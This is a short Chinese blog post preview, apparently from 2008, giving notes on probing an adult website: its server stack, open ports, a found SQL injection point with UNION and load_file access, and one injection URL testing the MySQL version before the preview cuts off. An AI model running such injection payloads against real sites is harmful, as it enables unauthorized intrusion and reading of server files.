popphen.net.ru
  • 1 
预览模式: 普通 | 列表

综合检测某成人站的临时笔记

作者:天晴无名氏 日期:2008-05-29 12:11

unix+apache+php+mysql

21=vsftpd;22=ssh;mysql=3306不开放远程连接

找到个注射点,mysql版本4.0以上支持union查询,当前用户权限足够可以load_file

以下是记录:

/gongji.php?ag_id=7 and ord(mid(version(),1,1))>51      /*判断my

[阅读全文]

标签: 综合检测
类别: Articles | 引用: 0 | 评论: 0 | 阅读: 121
  • 1